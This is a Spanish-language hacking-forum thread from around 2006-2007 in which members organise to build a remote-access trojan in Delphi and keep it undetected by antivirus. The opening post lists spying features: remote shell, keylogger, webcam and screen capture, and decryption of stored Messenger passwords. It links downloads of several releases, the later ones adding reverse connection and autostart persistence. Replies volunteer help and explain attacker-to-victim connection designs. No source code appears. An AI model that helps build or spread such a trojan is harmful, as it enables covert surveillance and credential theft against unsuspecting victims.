 Autor
|
Tema: [PROYECTO] TROYANO DARKGHOST EN DELPHI!!!!! (Leído 14356 veces)
|
manutenfruits
 Desconectado
Mensajes: 416
Well, I'm back!
|
HOLA!  Bueno, el otro dia se me ocurrio viendo un post de troyanos hacer uno aqui con gente del foro, uno propio, para intentar mantenerlo indetectable el mayor tiempo posible Sería de conexion inversa (quizá de ambas) y tendría todo aquello que queráis añadirle: file manager, editor de registro, shell remota, y algo de apagar equipo y ver la webcam y demas lammeradas si quereis...  Se busca gente con conocimientos de: Delphi (básico y avanzado), diseño gráfico para la GUI y bueno, qué más da... aunque no tengais ni repajolera idea os apuntais tambien, TODOS AQUELLOS CON GANAS DE APRENDER!! bueno, en fin, ánimo y a ver si sale bueno!!!  Ya tenemos pensado poner:- info del sistema (hecho)
- file manager (navegar, subir, descargar, ejecutar, borrar, etc)
- shell remota (imprescindible por si quieres hacer algo y no tienes la funcion incorporada)
- regedit
- keylogger y para escribirle cosas desde casa
- chat con la victima (uno asi a lo matrix, se que es una parida, pero siempre me ha hecho mucha gracia xDD)(hecho)
- mensajes pop-up(hecho)
- para ver la webcam y capturador de pantalla
- lammeradas tipo lucecitas del teclado locas, abrir y cerrar la bandeja de entrada.. todo lo que os de vuestra imginacion...
 (en proceso...) - manager de procesos y de ventanas (matar procesos, cerrar ventanas, etc)(hechos)
- pequeño programita para desencriptar las contraseñas guardadas del messenger del registro (muy buena idea, kiqueW )
Link de descarga de diferentes versiones: 1º Release (Conex. directa, Info del sistema):http://www.savefile.com/files/3389052º Release (Conex. directa, anterior + mensajes de alerta)http://www.savefile.com/files/3369073º Release (Conex. directa, anterior +mensajes de alerta con respuesta)http://rapidshare.com/files/7596395/DarkGhost_Upadate_0.1.rar4º Release (Conex. directa, anterior + manager de procesos)http://rapidshare.com/files/7647566/DarkGhost_Upadate_0.2.rar5º Release (Conex. directa + manager de ventanas Y PARA CAMBIARLES EL NOMBRE!!)http://rapidshare.com/files/7893099/DarkGhost_Upadate_0.3.rar6º Release (Conex. directa, anterior + chat)http://rapidshare.com/files/7893099/DarkGhost_Upadate_0.3.rar7º Release(Conex. directa, anterior + pequeños apañitos del manager de ventanas)http://rapidshare.com/files/8001570/DarkGhost_Upadate_0.4.rar8º Release (CONEX.INVERSA!!! , server en formless, editor del server, info de la victima, gestor de procesos y ventanas y mensajes pop-up)http://rapidshare.com/files/9186104/DarkGhost_Upadate_1.0.rar9º Release (Conex inversa, anterior + instalacion dl server con copia en el ordenador y autoarranque)http://www.minifolder.net/files/69/DarkGhost_Upadate_1.2.rarsalu2!! manutenfruits P.D: todo aque que se quiera apuntar que ponga un post! |
|
|
|
« Última modificación: 16 Enero 2007, 20:33 por manutenfruits »
|
En línea
|
|
|
|
Tor
Desconectado
Mensajes: 1.447
All you know is shit
|
Pues yo no tengo ni idea y sea dicho de paso, no tengo inet en casa, ahora estoy en la escuela  Pero en casa tengo unos manuales de Delphi que me baje de la mula y aun no los he mirado xD Aunque, si ahi un proyecto me los leere y a ver que podemos hacer! |
|
|
|
|
En línea
|
^^
|
|
|
Crwy
Desconectado
Mensajes: 231
|
Bueno ya dije en el otro mensage q me apuntaba, mis conocimientos son muy muy basicos , intentare ayudar en lo q pueda... Yo creo q tendriamos q empezar con una version con conexión directa, y luego ya lo hacemos inversa ¿no? Y tambien q tendriamos ir oensando en algun nombre.... x ejemployo prepongo elhacker Rat o algo asi en memoria al foro Saludos |
|
|
|
|
En línea
|
Pelearé hasta el último segundo y mi epitafio será: No estoy de acuerdo.
|
|
|
Jo$$
Desconectado
Mensajes: 122
|
y bueno, qué más da... aunque no tengais ni repajolera idea os apuntais tambien
Entonces me apunto xD |
|
|
|
|
En línea
|
|
|
|
kiqueW
Desconectado
Mensajes: 92
|
weno yo tengo conocimientos un poco limitados sobre programacion xo tengo el don de aprender a usar todo lo que se ponga pòr delante en tiempo record cero yo xD asi que si se puede me apunto
|
|
|
|
|
En línea
|
 Es mejor saber después de haber pensado y discutido que aceptar los saberes que nadie discute para no tener que pensar (fernando Sabater) smoke:cuban,drink:russian,drive:german,wear:italian,kiss:french,invest:american,be:spanish |
|
|
manutenfruits
Desconectado
Mensajes: 416
Well, I'm back!
|
Yo creo q tendriamos q empezar con una version con conexión directa, y luego ya lo hacemos inversa ¿no? la complejidad/simplicidad es la misma (que alguien me corrija si me equivoco) y si, el nombre hay que pensarlo, pero... vale, en memoria al foro, pero no vamos a poner elhacker de nombre porque si alguien lo usa y le cazan y pone nombre del troyano: elhacker.net va a haber problemas (digo yo... ) yo pongo de nombre: mmm se me ocurre algo con drill (taladro)... compudrill suena muy cutre xDD. Bueno, no se... salu2!! manutenfruits P.D: me agrada ver gente interesada, gracias |
|
|
|
|
En línea
|
|
|
|
Crwy
Desconectado
Mensajes: 231
|
Bueno como kieras, entonces empazamos con una inversa-multiconexión ??? Respecto lo de la complejidad no es la misma ni de lejos una multiconexión inversa bien echa es muxo mas complicada q una simple conexión directa(creo yo  ) Lo del nombre no creo q vaya haber problemas por poner ese nombre pero bueno, podriamos hacer votacion  Saludos |
|
|
|
|
En línea
|
Pelearé hasta el último segundo y mi epitafio será: No estoy de acuerdo.
|
|
|
manutenfruits
Desconectado
Mensajes: 416
Well, I'm back!
|
a ver, como yo creo que funciona esto segun he aprendido con el uso: conex directa: atacante: cliente victima:servidor el server de la victima tiene un puerto abierto a la escucha, y la victima (conociendo la IP y el número de puerto se conecta). conex inversa: atacante: servidor victima:cliente el atacante tiene un puerto a la escucha, y la victima tiene un server que esta continuamente intentando conectar con nosotros, a una IP y un puerto que le hemos dado anteriormente, antes de crearlo. asi que no deja de ser una conexion cliente-servidor en una direccion o en otra, da igual... lo que pasa es que la conex inversa es de descubrimiento mas reciente, por eso hay mas troyanos d conex directa (digo yo...) salu2!! manutenfruits lo de la votacion... vale, pero no se tampoco vamos a estar mucho tiempo con esto, yo ya tengo ganas de empezar!!! ah y quien sabe usar las APIS en Delphi, el winsocks y todoe so para hacer las conexiones? |
|
|
|
|
En línea
|
|
|
|
|
|
Crwy
Desconectado
Mensajes: 231
|
a ver,
como yo creo que funciona esto segun he aprendido con el uso:
conex directa:
atacante: cliente
victima:servidor
el server de la victima tiene un puerto abierto a la escucha, y la victima (conociendo la IP y el número de puerto se conecta).
conex inversa:
atacante: servidor
victima:cliente
el atacante tiene un puerto a la escucha, y la victima tiene un server que esta continuamente intentando conectar con nosotros, a una IP y un puerto que le hemos dado anteriormente, antes de crearlo.
No entendi nada de eso, conexion inversa: el cliente en nuestro ordenador abre un puerto y el server en el ordenador de la victiam se conecta a nosostros con ese puerto. y la directa el server abre el puerto y nosotros nos conectamos por ese puerto a la victima. Pero bueno, si dices q es igual haz una buena multiconexion inversa haber si es tan facil... una directa en 5 minutos esta lista .  Salu2 |
|
|
|
|
En línea
|
Pelearé hasta el último segundo y mi epitafio será: No estoy de acuerdo.
|
|
|
Crwy
Desconectado
Mensajes: 231
|
thnks thor, yo pensaba pillar los iconos q teneis en el vuestro qq estan muy guapos (si gusta el diseño por aki) Saludos |
|
|
|
|
En línea
|
Pelearé hasta el último segundo y mi epitafio será: No estoy de acuerdo.
|
|
|
manutenfruits
Desconectado
Mensajes: 416
Well, I'm back!
|
una directa en 5 minutos esta lista pues si sabes hacerla, pon el codigo para ir viendolo y que vayamos tomando nota... yo queria hacerlo de directa e inversa, como el taladrator (si no es mucha movida) y por cierto... por donde se empieza? por el GUI? y como lo haremos (colores y eso..)? salu2! manutenfruits |
|
|
|
|
En línea
|
|
|
|
Crwy
Desconectado
Mensajes: 231
|
Ok si kereis me opngo con una drecta muy basica con sockets(clientsocket y serversocket) Lo de inversa y directa q dices yyo creo q lo dejamos para versiones proximas xDDD Saludos |
|
|
|
|
En línea
|
Pelearé hasta el último segundo y mi epitafio será: No estoy de acuerdo.
|
|
|
xshumy
Desconectado
Mensajes: 11
|
Yo tambien me apunto al proyecto ... se algo de delphi y tambien de otros lenguajes... |
|
|
|
|
En línea
|
|
|
|
Helicot
Desconectado
Mensajes: 262
¿Q puedo colocar aki?
|
un proyecto interesante acaba de proponer, yo estudio informatica y tengo algunos conocimientos basicos de delphi, quizas pueda ayudar, empezando con los formularios y los menu (con las llamadas a los formularios)
solo quisiera saber si alguien sabe sobre la arquitectura de un troyano (basico), osea que otras funciones para el cliente tiene ademas de meterse en la computadora, disculpen mi ignorancia, pero no estoy muy informado de los troyanos que hacen hoy en dia
|
|
|
|
« Última modificación: 11 Diciembre 2006, 17:11 por L_a_R_k »
|
En línea
|
|
|
|
|
 |
